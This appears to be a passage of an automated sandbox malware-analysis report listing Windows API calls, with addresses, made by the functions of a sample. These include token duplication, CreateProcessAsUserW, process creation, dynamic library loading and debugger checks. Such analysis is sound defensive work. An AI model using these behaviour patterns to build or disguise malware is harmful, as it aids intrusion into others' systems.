      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000009), ref: 0040AC8D
      • Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040AC90
      • Part of subcall function 0040A98B: GetMenuCheckMarkDimensions.USER32 ref: 0040ACA7
      • Part of subcall function 0040A98B: lstrcmpA.KERNEL32(0041CDF0,00000000), ref: 0040ACD2
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,0000001D), ref: 0040AD36
      • Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040AD39
      • Part of subcall function 0040A98B: GetMessageExtraInfo.USER32 ref: 0040AD53
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000013), ref: 0040ADB1
      • Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040ADB4
      • Part of subcall function 0040A98B: GetClipboardOwner.USER32 ref: 0040ADCE
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000006), ref: 0040AE2F
      • Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040AE32
      • Part of subcall function 0040A98B: GetLastError.KERNEL32 ref: 0040AE4F
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000007), ref: 0040AE98
      • Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040AE9B
      • Part of subcall function 0040A98B: CountClipboardFormats.USER32 ref: 0040AEB8
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000006), ref: 0040AEFE
      • Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040AF01
      • Part of subcall function 0040A98B: GetFocus.USER32 ref: 0040AF1E
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000006), ref: 0040AF69
      • Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040AF6C
      • Part of subcall function 0040A98B: GetMessageExtraInfo.USER32 ref: 0040AF89
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000006), ref: 0040AFD4
      • Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040AFD7
      • Part of subcall function 0040A98B: GetForegroundWindow.USER32 ref: 0040AFF4
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000012), ref: 0040B052
      • Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040B055
      • Part of subcall function 0040A98B: GetProcessWindowStation.USER32 ref: 0040B072
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000008), ref: 0040B0BD
      • Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040B0C0
      • Part of subcall function 0040A98B: GetModuleHandleW.KERNEL32(00000000), ref: 0040B0DC
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000006), ref: 0040B125
      • Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040B128
      • Part of subcall function 0040A98B: GetCapture.USER32 ref: 0040B13F
      • Part of subcall function 0040A98B: StrStrA.SHLWAPI(0041CDF0,00000000), ref: 0040B1CD
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000012), ref: 0040B213
      • Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040B216
      • Part of subcall function 0040A98B: IsSystemResumeAutomatic.KERNEL32 ref: 0040B22D
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,0000000C), ref: 0040B29D
      • Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040B2A0
      • Part of subcall function 0040A98B: GetCurrentThreadId.KERNEL32 ref: 0040B2B7
      • Part of subcall function 0040A98B: StrStrA.SHLWAPI(0041CDF0,00000000), ref: 0040B2E2
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,0000002B), ref: 0040B363
      • Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040B366
      • Part of subcall function 0040A98B: GetClipboardSequenceNumber.USER32 ref: 0040B380
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000019), ref: 0040B40D
      • Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040B410
      • Part of subcall function 0040A98B: ReleaseCapture.USER32 ref: 0040B427
      • Part of subcall function 0040A98B: StrStrA.SHLWAPI(0041CDF0,00000000), ref: 0040B452
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000019), ref: 0040B4B4
      • Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040B4B7
      • Part of subcall function 0040A98B: GetProcessWindowStation.USER32 ref: 0040B4CE
      • Part of subcall function 0040A98B: StrStrA.SHLWAPI(0041CDF0,00000000), ref: 0040B4F9
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000019), ref: 0040B552
      • Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040B555
      • Part of subcall function 0040A98B: GetMenuCheckMarkDimensions.USER32 ref: 0040B569
      • Part of subcall function 0040A98B: StrStrA.SHLWAPI(0041CDF0,00000000), ref: 0040B594
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040B5AF
      • Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B5B8
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,00000005), ref: 0040B5BD
      • Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B5C0
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,706B7358), ref: 0040B5C7
      • Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B5CA
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B5D4
      • Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B5D7
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,39635538), ref: 0040B5DE
      • Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B5E1
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,7D0C1C30), ref: 0040B5E8
      • Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B5EB
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,48496F7A), ref: 0040B5F2
      • Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B5F5
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B5FF
      • Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B602
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B60C
      • Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B60F
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B619
      • Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B61C
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B626
      • Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B629
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B633
      • Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B636
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B640
      • Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B643
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B64D
      • Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B650
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B657
      • Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B65A
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B664
      • Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B667
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,371D0123), ref: 0040B66E
      • Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B671
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,4F1D1F21), ref: 0040B678
      • Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B67B
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,63784E47), ref: 0040B682
      • Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B685
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B68F
      • Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B692
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,77584575), ref: 0040B699
      • Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B69C
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B6A6
      • Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B6A9
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
      • Part of subcall function 00406C0B: wsprintfW.USER32 ref: 00406C4D
      • Part of subcall function 00406C0B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00406C6B
      • Part of subcall function 00406C0B: CloseHandle.KERNEL32(00000000), ref: 00406C7A
    • ExitThread.KERNEL32 ref: 00406F17
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040487E
      • Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 00404881
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040489A
      • Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 0040489D
      • Part of subcall function 0040485C: OpenProcess.KERNEL32(00000400,00000000), ref: 004048D1
      • Part of subcall function 0040485C: OpenProcessToken.ADVAPI32(00000000,00020008,00000000), ref: 00404907
      • Part of subcall function 0040485C: ProcessIdToSessionId.KERNEL32(?,?), ref: 00404921
      • Part of subcall function 0040485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,00000000,?), ref: 00404942
      • Part of subcall function 0040485C: GetLastError.KERNEL32 ref: 00404944
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,?), ref: 00404958
      • Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 0040495B
      • Part of subcall function 0040485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,?,?), ref: 00404979
      • Part of subcall function 0040485C: LookupAccountSidW.ADVAPI32(00000000,?,?,00000104,?,00000104,?), ref: 0040499D
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00404A0C
      • Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 00404A0F
      • Part of subcall function 0040485C: GetCursor.USER32 ref: 00404A20
      • Part of subcall function 0040485C: wsprintfW.USER32 ref: 00404A53
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404A6C
      • Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A75
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00404A7C
      • Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A7F
      • Part of subcall function 0040485C: CloseHandle.KERNEL32(00000000), ref: 00404A84
      • Part of subcall function 0040485C: CloseHandle.KERNEL32(?), ref: 00404A8D
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00404A9B
      • Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A9E
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404AA3
      • Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404AA6
    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00406E91
    • GetExitCodeProcess.KERNEL32(?), ref: 00406EA6
    • Sleep.KERNEL32(00001388), ref: 00406EB1
    • TerminateProcess.KERNEL32(00000000), ref: 00406EBE
    • CreateThread.KERNEL32(00000000,00000000,00406E18,?,00000000,00000000), ref: 00406ECE
    • CloseHandle.KERNEL32(00000000), ref: 00406EDB
    • CloseHandle.KERNEL32 ref: 00406EE3
    • FindAtomW.KERNEL32(?), ref: 00406F06
    • DeleteAtom.KERNEL32(?), ref: 00406F10
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000208,00000000,?,00000000,004077F1,00000000,?), ref: 004086D1
    • HeapAlloc.KERNEL32(00000000), ref: 004086D8
    • GetModuleFileNameW.KERNEL32(00000104,00000000,00000104), ref: 004086EC
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040870B
    • HeapFree.KERNEL32(00000000), ref: 0040870E
    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0040871A
    • HeapAlloc.KERNEL32(00000000), ref: 0040871D
    • GetLastError.KERNEL32 ref: 0040873B
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408746
    • HeapFree.KERNEL32(00000000), ref: 0040874D
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
      • Part of subcall function 00424C40: Sleep.KERNEL32(00000000,00000001,00000000,?,00423E3E,00000018,00435890,0000000C,00423ECE,00000000,00000000,?,00421317,0000000D), ref: 00424C61
      • Part of subcall function 00424C85: Sleep.KERNEL32(00000000), ref: 00424CAD
    • GetCPInfo.KERNEL32(?,?), ref: 0042BE95
    • ___crtGetStringTypeA.LIBCMT ref: 0042BF03
    • ___crtLCMapStringA.LIBCMT ref: 0042BF36
    • ___crtLCMapStringA.LIBCMT ref: 0042BF63
    • InterlockedDecrement.KERNEL32(?), ref: 0042C042
      • Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
      • Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 00424BF3
      • Part of subcall function 004244D8: ___crtGetLocaleInfoA.LIBCMT ref: 00424522
      • Part of subcall function 004244D8: GetLastError.KERNEL32 ref: 00424530
      • Part of subcall function 004244D8: ___crtGetLocaleInfoA.LIBCMT ref: 00424549
      • Part of subcall function 004244D8: ___crtGetLocaleInfoA.LIBCMT ref: 00424584
      • Part of subcall function 004244D8: GetLocaleInfoW.KERNEL32(?,?,00000000,00000000), ref: 0042460D
      • Part of subcall function 004244D8: GetLocaleInfoW.KERNEL32(?,?,00000000,00000000), ref: 0042462D
      • Part of subcall function 004244D8: GetLocaleInfoW.KERNEL32(?,?,00000000,00000002), ref: 00424669
    • InterlockedDecrement.KERNEL32(?), ref: 0042C108
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
      • Part of subcall function 00424C40: Sleep.KERNEL32(00000000,00000001,?,?,00423E3E,00000018,00435890,0000000C,00423ECE,?,?,?,00421317,0000000D,?,0042085F), ref: 00424C61
      • Part of subcall function 00424C85: Sleep.KERNEL32(00000000), ref: 00424CAD
    • GetCPInfo.KERNEL32(?,?), ref: 0042BE95
    • ___crtGetStringTypeA.LIBCMT ref: 0042BF03
    • ___crtLCMapStringA.LIBCMT ref: 0042BF36
    • ___crtLCMapStringA.LIBCMT ref: 0042BF63
    • InterlockedDecrement.KERNEL32(?), ref: 0042C042
      • Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
      • Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,0042085F,00000003), ref: 00424BF3
      • Part of subcall function 004244D8: ___crtGetLocaleInfoA.LIBCMT ref: 00424522
      • Part of subcall function 004244D8: GetLastError.KERNEL32 ref: 00424530
      • Part of subcall function 004244D8: ___crtGetLocaleInfoA.LIBCMT ref: 00424549
      • Part of subcall function 004244D8: ___crtGetLocaleInfoA.LIBCMT ref: 00424584
      • Part of subcall function 004244D8: GetLocaleInfoW.KERNEL32(?,?,00000000,00000002), ref: 00424669
    • InterlockedDecrement.KERNEL32(?), ref: 0042C108
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32(004344BC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000006D,?,00000000,00000000), ref: 0040A6B0
    • HeapAlloc.KERNEL32(00000000), ref: 0040A6B3
    • GetCurrentThreadId.KERNEL32 ref: 0040A6C5
      • Part of subcall function 0040A4DC: GetProcessHeap.KERNEL32(00000008,0000000A,00000001,00000000,76E6FE8D), ref: 0040A50C
      • Part of subcall function 0040A4DC: HeapAlloc.KERNEL32(00000000), ref: 0040A50F
      • Part of subcall function 0040A4DC: GetMessagePos.USER32 ref: 0040A52A
      • Part of subcall function 0040A4DC: GetProcessHeap.KERNEL32(00000008,00000013), ref: 0040A593
      • Part of subcall function 0040A4DC: HeapAlloc.KERNEL32(00000000), ref: 0040A596
      • Part of subcall function 0040A4DC: GetCurrentThreadId.KERNEL32 ref: 0040A5AA
      • Part of subcall function 0040A4DC: LoadLibraryA.KERNEL32(?), ref: 0040A5D4
      • Part of subcall function 0040A4DC: GetProcAddress.KERNEL32(00000000), ref: 0040A5DB
      • Part of subcall function 0040A4DC: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A5EF
      • Part of subcall function 0040A4DC: HeapFree.KERNEL32(00000000), ref: 0040A5F2
      • Part of subcall function 0040A4DC: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A614
      • Part of subcall function 0040A4DC: HeapFree.KERNEL32(00000000), ref: 0040A617
    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0040A717
    • HeapAlloc.KERNEL32(00000000), ref: 0040A71A
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A766
    • HeapFree.KERNEL32(00000000), ref: 0040A76D
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
      • Part of subcall function 004067FB: GetProcessHeap.KERNEL32(00000008,00000089), ref: 004068BE
      • Part of subcall function 004067FB: HeapAlloc.KERNEL32(00000000), ref: 004068C5
      • Part of subcall function 004067FB: CountClipboardFormats.USER32 ref: 004068D6
      • Part of subcall function 004067FB: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 0040690F
      • Part of subcall function 004067FB: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 00406934
      • Part of subcall function 004067FB: CloseHandle.KERNEL32(00000000), ref: 00406943
      • Part of subcall function 004067FB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040694E
      • Part of subcall function 004067FB: HeapFree.KERNEL32(00000000), ref: 00406955
    • ExitThread.KERNEL32 ref: 00406E11
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040487E
      • Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 00404881
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040489A
      • Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 0040489D
      • Part of subcall function 0040485C: OpenProcess.KERNEL32(00000400,00000000), ref: 004048D1
      • Part of subcall function 0040485C: OpenProcessToken.ADVAPI32(00000000,00020008,00000000), ref: 00404907
      • Part of subcall function 0040485C: ProcessIdToSessionId.KERNEL32(?,?), ref: 00404921
      • Part of subcall function 0040485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,00000000,?), ref: 00404942
      • Part of subcall function 0040485C: GetLastError.KERNEL32 ref: 00404944
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,?), ref: 00404958
      • Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 0040495B
      • Part of subcall function 0040485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,?,?), ref: 00404979
      • Part of subcall function 0040485C: LookupAccountSidW.ADVAPI32(00000000,?,?,00000104,?,00000104,?), ref: 0040499D
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00404A0C
      • Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 00404A0F
      • Part of subcall function 0040485C: GetCursor.USER32 ref: 00404A20
      • Part of subcall function 0040485C: wsprintfW.USER32 ref: 00404A53
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404A6C
      • Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A75
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00404A7C
      • Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A7F
      • Part of subcall function 0040485C: CloseHandle.KERNEL32(00000000), ref: 00404A84
      • Part of subcall function 0040485C: CloseHandle.KERNEL32(?), ref: 00404A8D
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00404A9B
      • Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A9E
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404AA3
      • Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404AA6
      • Part of subcall function 004064D2: OpenProcess.KERNEL32(02000000,00000000), ref: 00406529
      • Part of subcall function 004064D2: ProcessIdToSessionId.KERNEL32(?,?), ref: 00406541
      • Part of subcall function 004064D2: OpenProcessToken.ADVAPI32(00000000,000201EB,?,?,?), ref: 0040655F
      • Part of subcall function 004064D2: DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?,?,?), ref: 00406586
      • Part of subcall function 004064D2: SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,?), ref: 004065A6
      • Part of subcall function 004064D2: AllocateAndInitializeSid.ADVAPI32(?,00000001,00004000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 004065C0
      • Part of subcall function 004064D2: GetLengthSid.ADVAPI32(?,?,?), ref: 004065D8
      • Part of subcall function 004064D2: SetTokenInformation.ADVAPI32(?,0000001B,00000000,00000004,?,?), ref: 00406604
      • Part of subcall function 004064D2: CreateEnvironmentBlock.USERENV(?,?,00000001,?,?), ref: 0040660F
      • Part of subcall function 004064D2: GetProcessHeap.KERNEL32(00000008,00000041,?,?), ref: 00406679
      • Part of subcall function 004064D2: HeapAlloc.KERNEL32(00000000,?,?), ref: 00406680
      • Part of subcall function 004064D2: GetCaretBlinkTime.USER32 ref: 0040669C
      • Part of subcall function 004064D2: GetProcessHeap.KERNEL32(00000008,00000031,?,?), ref: 004066FF
      • Part of subcall function 004064D2: HeapAlloc.KERNEL32(00000000,?,?), ref: 00406706
      • Part of subcall function 004064D2: CreatePopupMenu.USER32 ref: 0040671A
      • Part of subcall function 004064D2: CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?), ref: 00406777
      • Part of subcall function 004064D2: OpenProcessToken.ADVAPI32(00000000,000201EB,?,?,?), ref: 00406793
      • Part of subcall function 004064D2: CloseHandle.KERNEL32(?), ref: 004067A8
      • Part of subcall function 004064D2: CloseHandle.KERNEL32(00007479), ref: 004067B0
      • Part of subcall function 004064D2: DestroyEnvironmentBlock.USERENV(00000000,?,?), ref: 004067BB
      • Part of subcall function 004064D2: CloseHandle.KERNEL32(?), ref: 004067C4
      • Part of subcall function 004064D2: GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 004067C9
      • Part of subcall function 004064D2: HeapFree.KERNEL32(00000000,?,?), ref: 004067D6
      • Part of subcall function 004064D2: GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004067DB
      • Part of subcall function 004064D2: HeapFree.KERNEL32(00000000,?,?), ref: 004067E2
      • Part of subcall function 004064D2: CloseHandle.KERNEL32(?), ref: 004067ED
      • Part of subcall function 004064D2: CloseHandle.KERNEL32(00000000), ref: 004067F0
      • Part of subcall function 0040D9F1: CreateFileW.KERNEL32(001CFDA8,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040DA1F
      • Part of subcall function 0040D9F1: GetFileSize.KERNEL32(00000000,00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA2E
      • Part of subcall function 0040D9F1: GetProcessHeap.KERNEL32(00000008,00000002,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA47
      • Part of subcall function 0040D9F1: HeapAlloc.KERNEL32(00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA4E
      • Part of subcall function 0040D9F1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040DA63
      • Part of subcall function 0040D9F1: GetLastError.KERNEL32(?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA8B
      • Part of subcall function 0040D9F1: CloseHandle.KERNEL32(00000000), ref: 0040DA99
      • Part of subcall function 0040D9F1: GetProcessHeap.KERNEL32(00000000,00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DAB0
      • Part of subcall function 0040D9F1: HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040DAB7
      • Part of subcall function 0040D9F1: GetProcessHeap.KERNEL32(00000000,?,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DAC3
      • Part of subcall function 0040D9F1: HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040DACA
    • CloseHandle.KERNEL32 ref: 00406DDB
      • Part of subcall function 0040D768: GetProcessHeap.KERNEL32(00000008,00000061,?,00000000,00000000), ref: 0040D7EF
      • Part of subcall function 0040D768: HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 0040D7F2
      • Part of subcall function 0040D768: GetShellWindow.USER32 ref: 0040D803
      • Part of subcall function 0040D768: CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000208,00000000,?,00000000,00000000), ref: 0040D83D
      • Part of subcall function 0040D768: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000208,?,00000000,00000000), ref: 0040D86B
      • Part of subcall function 0040D768: CloseHandle.KERNEL32 ref: 0040D880
      • Part of subcall function 0040D768: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0040D88E
      • Part of subcall function 0040D768: HeapFree.KERNEL32(00000000,?,00000000), ref: 0040D891
      • Part of subcall function 0040D768: StrCpyW.SHLWAPI(00000000,?,?,00000000,00000000), ref: 0040D89F
      • Part of subcall function 0040D768: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0040D8A7
      • Part of subcall function 0040D768: HeapFree.KERNEL32(00000000,?,00000000), ref: 0040D8AA
      • Part of subcall function 00409240: GetVersion.KERNEL32(?,00000000,00000000), ref: 00409263
